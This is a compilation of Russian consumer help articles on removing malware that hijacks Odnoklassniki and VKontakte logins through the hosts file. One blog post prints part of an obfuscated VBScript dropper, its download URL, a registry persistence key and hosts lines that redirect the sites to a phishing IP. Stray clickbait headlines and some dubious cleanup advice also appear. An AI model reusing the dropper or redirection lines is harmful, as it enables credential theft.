Существует несколько симптомов указывающих на заражение вашего компьютера вирусом. Самый распространенный — блокируется доступ для входа к учетной записи социальной сети Одноклассники якобы за рассылку спама. В качестве меры разблокировки доступа к учетной записи необходимо отправить SMS по указанному номеру. Одноклассники ни когда не просят отправлять смс в качестве исправления мнимых грехов. Однозначно, видя такое предложение вы стали жертвой вирусов.
Второй по распространенности случай — когда набрав в адресе ok.ru вы попадаете совсем не на сайт одноклассников. Как правило вам предлагают перейти на порно ресурс. Возможно вам подсунут фишенговый сайт, на котором украдут ваш логин и пароль.
Вирус блокирующий загрузку на ваш компьютер социальной сети Одноклассники обычно вы сами заносите на компьютер. В тот момент когда устанавливаете различные казалось бы безопасные программы. Программы созданы для перехвата ваших регистрационных данных — логина и пароля. Не используйте программы для накрутки лайков, скачивания музыки и прочих. Все они ВИРУСЫ перехватчики!
Как ФСБ следит за людьми в России | Взлом Telegram, камеры, паспорта
Есть ещё несколько вариантов, но в любом случае вы можете увидеть вашу страничку, доступ к ней заблокирован, закрыт! Итак, что же делать, как лечить и как удалить вирус?
Лечение от вируса в одноклассниках
В 90% случаев помогает исправление файла hosts. Находится он в папке с: Windows system32 driv ersetc. Бывает, что папка Windows называется по другому, но думаем вы быстро сориентируетесь. Если вы не компьютерный спец (а если да, то не читали бы этот текст), то в файле должна быть всего одна строчка «localhost 127.0.0.1». Все остальное смело стирайте.
Бывает так, что открыв этот файл — вы видите что он пуст. Но обратите внимание на скролинг, вирусописатели проявляют чудеса соц инженерии и вставляют пару страниц пробелов. Неопытным пользователям кажется что в файле ничего нет. Но стоит промотать вниз — и тут то вся правда откроется. Кстати, вы можете не заворачиваться, а просто стереть этот файл и перегрузится.
Он восстановится с единственной правильной строчкой.
Рекомендуем удалить все программы для накруток, скачивания музыки и видео из социальных сетей, быстрого просмотра и прочих типа (лови вконтакте, аналоги для одноклассников).
Надеемся мы помогли вам, и вы снова попадете в одноклассники без вирусов.
Источник: www.dostupest.ru
Дневники Лопуха
С детских лет меня мучил вопрос: «Как компьютер заражается вирусами». Наконец я узнал, прочувствовал на себе. Почему бы не поведать миру о том, как собственно проходит этот весьма занимательный процесс.
Для того, чтобы не написать пособие по заражению, а то куча народу воспользуется не дай бог, поэтому кое какие куски скриптов я буду удалять.
Я Взломал Твою Маму в Одноклассниках
Уже всем, наверное, поднадоели фразы о «дырявости» M S Windows , но, тем не менее, она остается самой распространенной системой на планете Земля. А может быть, система столь дырява из за своей распространенности.
Вот и сейчас, атака была проведена на одну из уязвимостей системы Windows XP, а именно на Windows Help Center.
Начало как обычно было давно (аж в 2010 году), об этом можно почитать на весьма известном ресурсе xakep.ru (в самом низу страницы).
Началось все просто.
IE выдал запрос на открытие программы, с ресурса tjyre . info . Явно вирус! Но интересно же!!
Переход на сайт http://tjyre.info не дает никакой информации, кроме того, что сайт находится в разработке (на момент выкладывания поста он вобще не работает, видимо прищучили).
Как узнать, что там предназначалось мне на комп? Элементарно – надо рассмотреть, куда ведет ссылка.
Ссылка классического вида (то что «хакер» прописал):
Как подсказывает мне моя безграмотность, ссылка на файл вируса скрыта за цифрами.
Путем несложных преобразований выясняется, что под цифрами скрывается копирование в системную папку моего компьютера скрипта с именем файла l . vbs , и его последующий запуск.
Адрес, по которому в сети размещен скрипт:
http://tjyre.info/games/hcp_vbs.php?f=17
Долго не раздумывая, открываю ссылку, поскольку открытие файла не сервере не всегда то же самое, что и его запуск на компе (рискованый шаг 😉 ).
Открывшийся файл содержит текст следующего вида:
«w=3000:x=200:y=1:z=false:a :Set e = Createobject(StrReverse(«tcejbOmetsySeliF.gnitpircS»)):Set f=e.GetSpecialFolder(2):b = f exe.ex2″:b=Replace(b,Month(«2010-02-16″),»e»):OT = «GET»:Set c = CreateObject(StrReverse(«PTTHLMX.2LMXSM»)):Set d = CreateObject(StrReverse(«maertS.BDODA»)) … Удалено из дурацких соображений… g = o . GetFile ( b ): g . Delete »
Текстовочка достаточно несложная:
видим ссылку, на какую-то страницу,
видим дату 16.02.2010 (получается, проводится некоторая маскировка вируса по дате, все таки приняли на вооружение, что маскироваться надо)
видим вывернутые на изнанку (при помощи реверса) команды, при помощи которых файл вируса залетает на наш компьютер.
Переходим по ссылке и… Здравствуй родной! Файл с названием readme.exe просит разрешения на посадку.
Благополучно присаживаем свежий readme.exe. Что же несет нам этот гость? Наверняка кучу радости.
Запуск readme . exe был очень удачно заблокирован программой antiwinlocker . За что ей честь и хвала. Но поскольку я все равно хочу посмотреть что получится, то защитников придется попросить удалиться на время.
Первый запуск вируса не был примечателен, что и понятно, вирус проник и затаился до следующей загрузки.
Перезагружаемся и вновь тишина. Загадка!!
Придется искать по тайным углам.
Находим в папке «C:Documents and SettingsAdminApplication Data» файл lsass.exe (имитирующий системный процесс).
В реестре соответственно обнаруживаем ключик:
«userinit»=»C:\WINDOWS\system32\userinit.exe,C:\Documents and Settings\Admin\Application Data\lsass.exe», что и ожидалось.
Но это еще не всё!
В папке «C:WINDOWSsystem32driversetc» есть волшебный файл hosts, в который вирус дописывает с десяток волшебных строк (просмотрите пожалуйста ВЕСЬ файл hosts):
31.214.145.151 www.vkontakte.ru
127.0.0.1 downloads.kaspersky-labs.com
127.0.0.1 dnl-20.geo.kaspersky.com
При помощи этих строк производится перенаправление с сайтов одноклассники и vkontakte на вполне определенный сайт, а также устраивается полный облом обновлениям касперского (вирус похож на Trojan.Win32.Ddox.ci).
Что мы видим перейдя на сайт злодея? Мы видим главную страницу одноклассников, но если ввести логин и пароль, то они прямиком отправятся к «злодею». А если нажать на какую нибудь ссылку то получаем весьма прикольный запрос на «валидацию аккаунта». Причем в тексте четко сказано: «Услуга недоступна абонентам некоторым регионам Мегафона». Такой серьезный подход к делу, что я не сразу въехал в смысл фразы.
Проверьте сами (http://31.214.145.151/).
У настоящих одноклассников IP совсем другой.
Как с этой фигней бороться.
Для начала, сделать так, как советуют в «хакере» — установить заплатку (или удалить ветку реестра). Цитирую:
Отключить протокол hcp (удалив HKCRHCPshellopen) центр помощи.
Ждать патча от Microsoft.
Далее, необходимо удалить валяющийся в «C:Documents and SettingsAdminApplication Data» файл lsass.exe. Лучше это сделать загрузившись с внешнего носителя, чтобы загруженный в память процесс не мешал Вам.
Удалить из файла «C:WINDOWSsystem32driversetchosts» лишние строки про одноклассников, вконтакте, и касперского.
Исправить в реестре (ветка [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon])
«userinit»=»C:\WINDOWS\system32\userinit.exe,C:\Documents and Settings\Admin\Application Data\lsass.exe»
Источник: imho-karma.blogspot.com
Валидация аккаунта ВКонтакте. Что делать, как решить, это вирус?
Здравсвуйте друзья! Поговорим сегодня о такой проблеме, как валидация аккаунта в социальной сети ВКонтакте. Как убрать валидацию и от чего она появляется. Что бы было понятно, давайте сначала разберемся, что такое валидация аккаунта и какая она бывает. Сегодня мы говорим исключительно о социальной сети ВКонтакте, хотя такая проблема очень часто встречается и в Одноклассниках.
Валидация аккаунта — это привязка Вашей страницы к Вашему номеру мобильного телефона. Это нужно для того, что бы можно было легко восстановить доступ к Вашей странице в социальной сети ВКонтакте. Вам просто придет СМС сообщение с кодом, который Вы введете на сайте и получите доступ к своей страничке. В случае, если Вас например взломали, или Вы забыли свой пароль.
ВКонтакте сейчас уже невозможно зарегистрироваться без указания номера Вашего мобильного телефона. А Все ранее созданные странички получили предложение указать номер мобильного телефона, тем самым привязали свою страницу к номеру.
Выше я описал, если так можно сказать, официальный способ валидации аккаунта в социальной сети ВКонтакте.
Вы должны помнить, что ВКонтакте никогда не попросит Вас отправить СМС на короткий (да и на длинный) номер! Валидация — бесплатная. Вы просто вводите свой номер телефона и Вам приходит код, который Вы указывает на сайте для проверки, что тот кто пытается войти на страницу — владелец номера, к которому привязана эта страница.
Но статья не о привязке вашей страницы к номеру, а о вирусах, которые маскируются под «Валидацию аккаунта» и просят Вас отправить СМС на короткий номер, ввести свой логин, пароль, или другие данные. Вот сейчас мы постараемся решить эту проблему и убрать валидацию аккаунта, под которой прячется вирус.
Вы заходите ВКонтакт и видите вот такое окно:
Проверьте адрес, который прописан в адресной строке браузера. Там должен быть например http://vk.com. Очень часто вирус перенаправляет на другой, похожий адрес, а сам сайт очень похожий на сайт ВКонтакте.
Но так же не стоит забывать, что это может быть и нормальная проверка Вашего номера, которая Вам ничем не угрожает. Сейчас проверим.
Валидация аккаунта ВКонтакте — вирус, или нет?
Для того, что бы проверить, вирус ли это, достаточно попытаться зайти Вконтакт с другого компьютера, или мобильного устройства. Если все нормально и никаких окон с просьбой что-то ввести, или что-то отправить нет, то значит у Вас на компьютере развлекается вирус, который мы попытаемся уничтожить, читайте статью дальше.
Если у Вас нет возможности проверить на другом компьютере, то попробуйте зайти ВКонтакт через анонимайзер, к примеру можно взять http://cameleo.ru . Переходим по ссылке и внизу страницы нажимаем на vk.com.
На странице которая откроется, попробуйте войти на свою страницу. Если никаких окон с «Валидация аккаунта» не появится, то значит у Вас на компьютере точно вирус.
Как удалить вирус валидация аккаунта ВКонтакте?
Вот мы и подошли к самой интересной части этой статьи. Сейчас я расскажу Вам о некоторых способах, которым можно удалить этот вирус.
Вирусы, которые маскируются под валидацию аккаунта, самые разные и каждый пытается спрятаться как можно глубже в системе, что бы его не нашли. Если говорить о том, где можно поймать такой вирус, то здесь вариантов очень много. Возможно Вы перешли по какой-то ссылке в той же социальной сети ВКонтакте и после этого уже зайти Вконтакте не получается. Возможно Вы скачали какой-то файл и установили его. Вариантов очень много, поймать вирус, это не проблема — проблема от него избавится (правда жизни :)) .
Обычно все вирусы, которые перенаправляют на другие сайты, которые запрещают доступ к определенным сайтам и которые показывают такие окна как «Валидация аккаунта» — изменяют файл hosts. Они могут прописывать туда свои строчки, которые будут Вас перенаправлять на другие сайты, могут создать скрытую копию файла hosts и т. д.
Я уже писал статью Не могу зайти ВКонтакт. Редактируем файл hosts. В которой писал о том, как очистить файл hosts. Но сейчас еще раз более подробно обо всем напишу. Но прежде чем искать и исправлять проблему вручную, мы сначала запустим «Тяжелую артиллерию» :).
Проверим компьютер утилитой Dr.Web CureIt и утилитой AVZ. Так же с помощью AVZ попробуем автоматически вылечить файл hosts.
Проверяем компьютер на вирусы с помощью Dr.Web CureIt и AVZ
Dr.Web CureIt — хорошая утилита, которая проссканирует Ваш компьютер и при обнаружении вируса попробуйте его нейтрализовать. Так же утилита попытается исправить все проблемы, которые натворил вирус. Я уже писал подробную инструкцию о том как пользоваться утилитой CureIt — Проверяем эффективность антивируса и быстро удаляем вирусы с помощью бесплатной утилиты Dr.Web CureIt.
AVZ — еще одно классное средство, которое поможет решить проблему с вирусами. Подробная инструкция — Обзор и работа с антивирусной утилитой AVZ.
Так же с помощью AVZ можно попытаться вылечить файл hosts. Делается это так:
Запустите утилиту, нажмите на «Файл» и выберите «Восстановление системы».
Откроется окно, в котором нужно отметить пункт «Очистка файла hosts» и выбрать «Выполнить отмеченные операции».
Появится предупреждение, нажмите «Да».
После этих действий перезагрузите компьютер и попробуйте зайти ВКонтакт. Если проблема осталась, то читаем дальше.
Очищаем, удаляем, или заменяем файл hosts
Откройте файл hosts и посмотрите, есть ли в нем ненужен строчки (как должен выглядит файл hosts смотрите тут). Этот файл находится в: C:WindowsSystem32DriversEtc (если у Вас 64-разрядная система, то путь будет таким: C:WindowsSysWOW64DriversEtc) .
Вы можете попробовать удалить ненужные строчки открыв его через Блокнот и сохранить файл.
Многие так же просто полностью удаляют папку Etc. Это как правило не страшно для работы системы и помогает решить возникшую проблему. Но эти действия Вы делаете на свой страх и риск!
Бывают случаи, когда вирус создает скрытую копию файла hosts в этой же папке Etc. Вы вносите изменения в файл hosts, но результата нет и это не странно. Решить эту проблему помогает замена самого файла оригиналом.
Нажмите на эту ссылку что бы скачать файл hosts.
Затем нажмите сохранить, перейдите в папку Etc в которой находится файл hosts и нажмите два раза на него. Появится окно с вопросом заменять ли файл — согласитесь.
Ну с файлом hosts вроде бы разобрались.
Не забудьте еще проверить автозагрузку — Как это сделать, я писал в статье Как убрать программы из автозагрузки (автозапуска)? Удалите оттуда все странные программы, особенно те, которые имеют расширение .cmd и .bat.
Проверяем DNS-сервер. Возможно вирус заменил его
Подобные вирусы могут изменять DNS сервера. Давайте проверим:
Зайдите в «Пуск» — «Панель управления» — «Центр управления сетями и общим доступом» — «Изменение параметров адаптера».
Нажмите правой кнопкой мыши на то соединение, через которое Вы подключаетесь к интернету и выберите «Свойства».
Выделите «Протокол Интернета версии 4 (TCP/IPv4)» и нажмите кнопку «Свойства».
И посмотрите какой DNS там прописан. Если там какой-то незнакомый Вам адрес, то замените на свой, или установите получать автоматически.
Нужно еще выполнить две команды:
Откройте «Пуск», «Все программы», «Стандартные» и запустите Командную строку.
По очереди введите две команды:
route -f
ipconfig /flushdns
После каждой команды подтвердите ее нажатием на Enter.
После этих действий перезагрузите компьютер и попробуйте снова зайти ВКонтакт.
Заключение
Ну вроде бы все основные способы рассмотрел, которыми можно поймать этот вирус. Если у Вас не получилось решить проблему описанными Выше способами, то значит у Вас более серьезный случай. Помню у меня была проблема с Валидацией аккаунта в Одноклассниках (описывал в статье Не могу войти в одноклассники. Ошибка 404 Not found.
Не получается восстановить доступ через номер.), решил только переустановкой Windows. Правда тогда много времени разбираться не было. Это я к тому, что переустановка операционной системы помогает :).
Вопросы, рекомендации и дополнения жду в комментариях. Всего хорошего!
Понравилась статья? Оцените её:
Источник: f1comp.ru